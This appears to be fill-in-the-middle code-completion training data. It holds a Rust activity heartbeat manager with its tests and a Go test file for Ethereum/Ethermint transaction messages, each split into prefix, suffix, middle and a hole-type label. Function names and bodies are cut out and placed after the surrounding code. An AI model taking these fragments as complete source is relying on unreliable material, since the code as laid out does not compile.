if !self.shutting_down.load(Ordering::Relaxed) {
self.events
.send(LifecycleEvent::Shutdown)
.expect("should be able to send shutdown event");
self.shutting_down.store(true, Ordering::Relaxed);
}
let mut handle = self.join_handle.lock().await;
if let Some(h) = handle.take() {
h.await.expect("shutdown should exit cleanly");
}
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatManager<SG> {
#![allow(clippy::new_ret_no_self)]
/// Creates a new instance of an activity heartbeat manager and returns a handle to the user,
/// which allows to send new heartbeats and initiate the shutdown.
pub fn new(sg: Arc<SG>) -> ActivityHeartbeatManagerHandle {
let (shutdown_tx, shutdown_rx) = channel(false);
let (events_tx, events_rx) = unbounded_channel();
let (cancels_tx, cancels_rx) = unbounded_channel();
let s = Self {
heartbeat_processors: Default::default(),
events_tx: events_tx.clone(),
events_rx,
shutdown_tx,
shutdown_rx,
cancels_tx,
server_gateway: sg,
};
let join_handle = tokio::spawn(s.lifecycle());
ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool::new(false),
events: events_tx,
incoming_cancels: Mutex::new(cancels_rx),
join_handle: Mutex::new(Some(join_handle)),
}
}
/// Main loop, that handles all heartbeat requests and dispatches them to processors.
async fn lifecycle(mut self) {
while let Some(event) = self.events_rx.recv().await {
match event {
LifecycleEvent::Heartbeat(heartbeat) => self.record(heartbeat),
LifecycleEvent::Shutdown => break,
LifecycleEvent::CleanupProcessor(task_token) => {
self.heartbeat_processors.remove(&task_token);
}
}
}
self.shutdown().await.expect("shutdown should exit cleanly")
}
/// Records heartbeat, by sending it to the processor.
/// New processor is created if one doesn't exist, otherwise new event is dispatched to the
/// existing processor's receiver channel.
fn | (&mut self, heartbeat: ValidActivityHeartbeat) {
match self.heartbeat_processors.get(&heartbeat.task_token) {
Some(handle) => {
handle
.heartbeat_tx
.send(heartbeat.details)
.expect("heartbeat channel can't be dropped if we are inside this method");
}
None => {
let (heartbeat_tx, heartbeat_rx) = channel(heartbeat.details);
let processor = ActivityHeartbeatProcessor {
task_token: heartbeat.task_token.clone(),
delay: heartbeat.delay,
heartbeat_rx,
shutdown_rx: self.shutdown_rx.clone(),
events_tx: self.events_tx.clone(),
cancels_tx: self.cancels_tx.clone(),
server_gateway: self.server_gateway.clone(),
};
let join_handle = tokio::spawn(processor.run());
let handle = ActivityHeartbeatProcessorHandle {
heartbeat_tx,
join_handle,
};
self.heartbeat_processors
.insert(heartbeat.task_token, handle);
}
}
}
/// Initiates termination of all heartbeat processors by sending a signal and awaits termination
pub async fn shutdown(mut self) -> Result<(), JoinError> {
self.shutdown_tx
.send(true)
.expect("shutdown channel can't be dropped before shutdown is complete");
for v in self.heartbeat_processors.drain() {
v.1.join_handle.await?;
}
Ok(())
}
}
impl<SG: ServerGatewayApis + Send + Sync + 'static> ActivityHeartbeatProcessor<SG> {
async fn run(mut self) {
// Each processor is initialized with heartbeat payloads, first thing we need to do is send
// it out.
self.record_heartbeat().await;
loop {
sleep(self.delay).await;
select! {
biased;
_ = self.heartbeat_rx.changed() => {
self.record_heartbeat().await;
}
_ = self.shutdown_rx.changed() => {
break;
}
_ = sleep(self.delay) => {
// Timed out while waiting for the next heartbeat. We waited 2 * delay in total,
// where delay is 1/2 of the activity heartbeat timeout. This means that
// activity has either timed out or completed by now.
break;
}
};
}
self.events_tx
.send(LifecycleEvent::CleanupProcessor(self.task_token))
.expect("cleanup requests should not be dropped");
}
async fn record_heartbeat(&mut self) {
let details = self.heartbeat_rx.borrow().clone();
match self
.server_gateway
.record_activity_heartbeat(self.task_token.clone(), details.into_payloads())
.await
{
Ok(RecordActivityTaskHeartbeatResponse { cancel_requested }) => {
if cancel_requested {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
}
// Send cancels for any activity that learns its workflow already finished (which is
// one thing not found implies - other reasons would seem equally valid).
Err(s) if s.code() == tonic::Code::NotFound => {
self.cancels_tx
.send(self.task_token.clone())
.expect("Receive half of heartbeat cancels not blocked");
}
Err(e) => {
warn!("Error when recording heartbeat: {:?}", e)
}
}
}
}
#[cfg(test)]
mod test {
use super::*;
use crate::pollers::MockServerGatewayApis;
use crate::protos::coresdk::common::Payload;
use crate::protos::temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse;
use std::time::Duration;
/// Ensure that hearbeats that are sent with a small delay are aggregated and sent roughly once
/// every 1/2 of the heartbeat timeout.
#[tokio::test]
async fn process_heartbeats_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..40 {
sleep(Duration::from_millis(10)).await;
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// Ensure that heartbeat can be called from a tight loop without any delays, resulting in two
/// interactions with the server - one immediately and one after 500ms after the delay.
#[tokio::test]
async fn process_tight_loop_and_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
// Sending heartbeat requests for 400ms, this should send first hearbeat right away, and all other
// requests should be aggregated and last one should be sent to the server in 500ms (1/2 of heartbeat timeout).
for i in 0u8..u8::MAX {
record_heartbeat(&hm, fake_task_token.clone(), i, Duration::from_millis(1000));
}
hm.shutdown().await;
}
/// This test reports one heartbeat and waits until processor times out and exits then sends another one.
/// Expectation is that new processor should be spawned and heartbeat shouldn't get lost.
#[tokio::test]
async fn report_heartbeat_after_timeout() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(2);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
let fake_task_token = vec![1, 2, 3];
record_heartbeat(&hm, fake_task_token.clone(), 0, Duration::from_millis(100));
sleep(Duration::from_millis(500)).await;
record_heartbeat(&hm, fake_task_token.clone(), 1, Duration::from_millis(100));
hm.shutdown().await;
}
/// Recording new heartbeats after shutdown is not allowed, and will result in error.
#[tokio::test]
async fn record_after_shutdown() {
let mut mock_gateway = MockServerGatewayApis::new();
mock_gateway
.expect_record_activity_heartbeat()
.returning(|_, _| Ok(RecordActivityTaskHeartbeatResponse::default()))
.times(0);
let hm = ActivityHeartbeatManager::new(Arc::new(mock_gateway));
hm.shutdown().await;
match hm.record(
ActivityHeartbeat {
task_token: vec![1, 2, 3],
details: vec![Payload {
// payload doesn't matter in this case, as it shouldn't get sent anyways.
..Default::default()
}],
},
Duration::from_millis(1000),
) {
Ok(_) => {
unreachable!("heartbeat should not be recorded after the shutdown")
}
Err(e) => {
matches!(e, ActivityHeartbeatError::ShuttingDown);
}
}
}
fn record_heartbeat(
hm: &ActivityHeartbeatManagerHandle,
task_token: Vec<u8>,
i: u8,
delay: Duration,
) {
hm.record(
ActivityHeartbeat {
task_token,
details: vec![Payload {
metadata: Default::default(),
data: vec![i],
}],
},
delay,
)
.expect("hearbeat recording should not fail");
}
}
| record | identifier_name |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
}
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) |
func TestMsgEthereumTx_ChainID(t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
}
| {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
} | identifier_body |
msg_test.go | package types
import (
"bytes"
"fmt"
"github.com/ethereum/go-ethereum/common/hexutil"
"github.com/ethereum/go-ethereum/common/math"
"math/big"
"strings"
"testing"
"github.com/stretchr/testify/require"
"github.com/cosmos/cosmos-sdk/codec"
sdk "github.com/cosmos/cosmos-sdk/types"
"github.com/okex/exchain/app/crypto/ethsecp256k1"
ethcmn "github.com/ethereum/go-ethereum/common"
ethtypes "github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/rlp"
"github.com/tendermint/tendermint/crypto/secp256k1"
)
func TestMsgEthermint(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
require.NotNil(t, msg)
require.Equal(t, msg.Recipient, &addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthermint)
require.True(t, bytes.Equal(msg.GetSignBytes(), sdk.MustSortJSON(ModuleCdc.MustMarshalJSON(msg))))
require.True(t, msg.GetSigners()[0].Equals(fromAddr))
require.Equal(t, *msg.To(), ethcmn.BytesToAddress(addr.Bytes()))
// clear recipient
msg.Recipient = nil
require.Nil(t, msg.To())
}
func TestMsgEthermintValidation(t *testing.T) {
testCases := []struct {
nonce uint64
to *sdk.AccAddress
amount sdk.Int
gasLimit uint64
gasPrice sdk.Int
payload []byte
expectPass bool
from sdk.AccAddress
}{
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(0), gasPrice: sdk.NewInt(100000), expectPass: true},
{amount: sdk.NewInt(-1), gasPrice: sdk.NewInt(100000), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(-1), expectPass: false},
{amount: sdk.NewInt(100), gasPrice: sdk.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthermint(tc.nonce, tc.to, tc.amount, tc.gasLimit, tc.gasPrice, tc.payload, tc.from)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "test: %v", i)
} else {
require.NotNil(t, msg.ValidateBasic(), "test: %v", i)
}
}
}
func TestMsgEthermintEncodingAndDecoding(t *testing.T) {
addr := newSdkAddress()
fromAddr := newSdkAddress()
msg := NewMsgEthermint(0, &addr, sdk.NewInt(1), 100000, sdk.NewInt(2), []byte("test"), fromAddr)
raw, err := ModuleCdc.MarshalBinaryBare(msg)
require.NoError(t, err)
var msg2 MsgEthermint
err = ModuleCdc.UnmarshalBinaryBare(raw, &msg2)
require.NoError(t, err)
require.Equal(t, msg.AccountNonce, msg2.AccountNonce)
require.Equal(t, msg.Recipient, msg2.Recipient)
require.Equal(t, msg.Amount, msg2.Amount)
require.Equal(t, msg.GasLimit, msg2.GasLimit)
require.Equal(t, msg.Price, msg2.Price)
require.Equal(t, msg.Payload, msg2.Payload)
require.Equal(t, msg.From, msg2.From)
}
func newSdkAddress() sdk.AccAddress {
tmpKey := secp256k1.GenPrivKey().PubKey()
return sdk.AccAddress(tmpKey.Address().Bytes())
}
func TestMsgEthereumTx(t *testing.T) {
addr := GenerateEthAddress()
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Equal(t, *msg.Data.Recipient, addr)
require.Equal(t, msg.Route(), RouterKey)
require.Equal(t, msg.Type(), TypeMsgEthereumTx)
require.NotNil(t, msg.To())
require.Equal(t, msg.GetMsgs(), []sdk.Msg{msg})
require.Panics(t, func() { msg.GetSigners() })
require.Panics(t, func() { msg.GetSignBytes() })
msg = NewMsgEthereumTxContract(0, nil, 100000, nil, []byte("test"))
require.NotNil(t, msg)
require.Nil(t, msg.Data.Recipient)
require.Nil(t, msg.To())
}
func TestMsgEthereumTxValidation(t *testing.T) {
testCases := []struct {
msg string
amount *big.Int
gasPrice *big.Int
expectPass bool
}{
{msg: "pass", amount: big.NewInt(100), gasPrice: big.NewInt(100000), expectPass: true},
{msg: "invalid amount", amount: big.NewInt(-1), gasPrice: big.NewInt(100000), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(-1), expectPass: false},
{msg: "invalid gas price", amount: big.NewInt(100), gasPrice: big.NewInt(0), expectPass: false},
}
for i, tc := range testCases {
msg := NewMsgEthereumTx(0, nil, tc.amount, 0, tc.gasPrice, nil)
if tc.expectPass {
require.Nil(t, msg.ValidateBasic(), "valid test %d failed: %s", i, tc.msg)
} else {
require.NotNil(t, msg.ValidateBasic(), "invalid test %d passed: %s", i, tc.msg)
}
}
}
func TestMsgEthereumTxRLPSignBytes(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
chainID := big.NewInt(3)
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
hash := msg.RLPSignBytes(chainID)
require.Equal(t, "5BD30E35AD27449390B14C91E6BCFDCAADF8FE44EF33680E3BC200FC0DC083C7", fmt.Sprintf("%X", hash))
}
func TestMsgEthereumTxRLPEncode(t *testing.T) {
addr := ethcmn.BytesToAddress([]byte("test_address"))
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
raw, err := rlp.EncodeToBytes(&msg)
require.NoError(t, err)
require.Equal(t, ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080"), raw)
}
func TestMsgEthereumTxRLPDecode(t *testing.T) {
var msg MsgEthereumTx
raw := ethcmn.FromHex("E48080830186A0940000000000000000746573745F61646472657373808474657374808080")
addr := ethcmn.BytesToAddress([]byte("test_address"))
expectedMsg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := rlp.Decode(bytes.NewReader(raw), &msg)
require.NoError(t, err)
require.Equal(t, expectedMsg.Data, msg.Data)
// value size exceeds available input length of stream
mockStream := rlp.NewStream(bytes.NewReader(raw), 1)
require.Error(t, msg.DecodeRLP(mockStream))
}
func TestMsgEthereumTxSig(t *testing.T) {
chainID, zeroChainID := big.NewInt(3), big.NewInt(0)
priv1, _ := ethsecp256k1.GenerateKey()
priv2, _ := ethsecp256k1.GenerateKey()
addr1 := ethcmn.BytesToAddress(priv1.PubKey().Address().Bytes())
trimed := strings.TrimPrefix(addr1.Hex(), "0x")
fmt.Printf("%s\n", trimed)
addrSDKAddr1, err := sdk.AccAddressFromHex(trimed)
require.NoError(t, err)
addr2 := ethcmn.BytesToAddress(priv2.PubKey().Address().Bytes())
// require valid signature passes validation
msg := NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err := msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
require.NotEqual(t, addr2, signer)
// msg atomic load
signer, err = msg.VerifySig(chainID)
require.NoError(t, err)
require.Equal(t, addr1, signer)
signers := msg.GetSigners()
require.Equal(t, 1, len(signers))
require.True(t, addrSDKAddr1.Equals(signers[0]))
// zero chainID
err = msg.Sign(zeroChainID, priv1.ToECDSA())
require.Nil(t, err)
_, err = msg.VerifySig(zeroChainID)
require.Nil(t, err)
// require invalid chain ID fail validation
msg = NewMsgEthereumTx(0, &addr1, nil, 100000, nil, []byte("test"))
err = msg.Sign(chainID, priv1.ToECDSA())
require.Nil(t, err)
signer, err = msg.VerifySig(big.NewInt(4))
require.Error(t, err)
require.Equal(t, ethcmn.Address{}, signer)
}
func | (t *testing.T) {
chainID := big.NewInt(3)
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
msg := NewMsgEthereumTx(0, &addr, nil, 100000, nil, []byte("test"))
err := msg.Sign(chainID, priv.ToECDSA())
require.Nil(t, err)
require.True(t, chainID.Cmp(msg.ChainID()) == 0)
msg.Data.V = big.NewInt(27)
require.NotNil(t, msg.ChainID())
msg.Data.V = math.MaxBig256
expectedChainID := new(big.Int).Div(new(big.Int).Sub(math.MaxBig256, big.NewInt(35)), big.NewInt(2))
require.True(t, expectedChainID.Cmp(msg.ChainID()) == 0)
}
func TestMsgEthereumTxGetter(t *testing.T) {
priv, _ := ethsecp256k1.GenerateKey()
addr := ethcmn.BytesToAddress(priv.PubKey().Address().Bytes())
amount, gasPrice, gasLimit := int64(1024), int64(2048), uint64(100000)
expectedFee := gasPrice * int64(gasLimit)
expectCost := expectedFee + amount
msg := NewMsgEthereumTx(0, &addr, big.NewInt(amount), gasLimit, big.NewInt(gasPrice), []byte("test"))
require.Equal(t, gasLimit, msg.GetGas())
require.True(t, big.NewInt(expectedFee).Cmp(msg.Fee()) == 0)
require.True(t, big.NewInt(expectCost).Cmp(msg.Cost()) == 0)
expectedV, expectedR, expectedS := big.NewInt(1), big.NewInt(2), big.NewInt(3)
msg.Data.V, msg.Data.R, msg.Data.S = expectedV, expectedR, expectedS
v, r, s := msg.RawSignatureValues()
require.True(t, expectedV.Cmp(v) == 0)
require.True(t, expectedR.Cmp(r) == 0)
require.True(t, expectedS.Cmp(s) == 0)
}
func TestMarshalAndUnmarshalLogs(t *testing.T) {
var cdc = codec.New()
logs := []*ethtypes.Log{
{
Address: ethcmn.BytesToAddress([]byte{0x11}),
TxHash: ethcmn.HexToHash("0x01"),
// May need to find workaround since Topics is required to unmarshal from JSON
Topics: []ethcmn.Hash{},
Removed: true,
},
{Address: ethcmn.BytesToAddress([]byte{0x01, 0x11}), Topics: []ethcmn.Hash{}},
}
raw, err := codec.MarshalJSONIndent(cdc, logs)
require.NoError(t, err)
var logs2 []*ethtypes.Log
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
require.Len(t, logs2, 2)
require.Equal(t, logs[0].Address, logs2[0].Address)
require.Equal(t, logs[0].TxHash, logs2[0].TxHash)
require.True(t, logs[0].Removed)
emptyLogs := []*ethtypes.Log{}
raw, err = codec.MarshalJSONIndent(cdc, emptyLogs)
require.NoError(t, err)
err = cdc.UnmarshalJSON(raw, &logs2)
require.NoError(t, err)
}
func TestMsgString(t *testing.T) {
expectedUint64, expectedSDKAddr, expectedInt := uint64(1024), newSdkAddress(), sdk.OneInt()
expectedPayload, err := hexutil.Decode("0x1234567890abcdef")
require.NoError(t, err)
expectedOutput := fmt.Sprintf("nonce=1024 gasPrice=1 gasLimit=1024 recipient=%s amount=1 data=0x1234567890abcdef from=%s",
expectedSDKAddr, expectedSDKAddr)
msgEthermint := NewMsgEthermint(expectedUint64, &expectedSDKAddr, expectedInt, expectedUint64, expectedInt, expectedPayload, expectedSDKAddr)
require.True(t, strings.EqualFold(msgEthermint.String(), expectedOutput))
expectedHexAddr := ethcmn.BytesToAddress([]byte{0x01})
expectedBigInt := big.NewInt(1024)
expectedOutput = fmt.Sprintf("nonce=1024 price=1024 gasLimit=1024 recipient=%s amount=1024 data=0x1234567890abcdef v=0 r=0 s=0", expectedHexAddr.Hex())
msgEthereumTx := NewMsgEthereumTx(expectedUint64, &expectedHexAddr, expectedBigInt, expectedUint64, expectedBigInt, expectedPayload)
require.True(t, strings.EqualFold(msgEthereumTx.String(), expectedOutput))
}
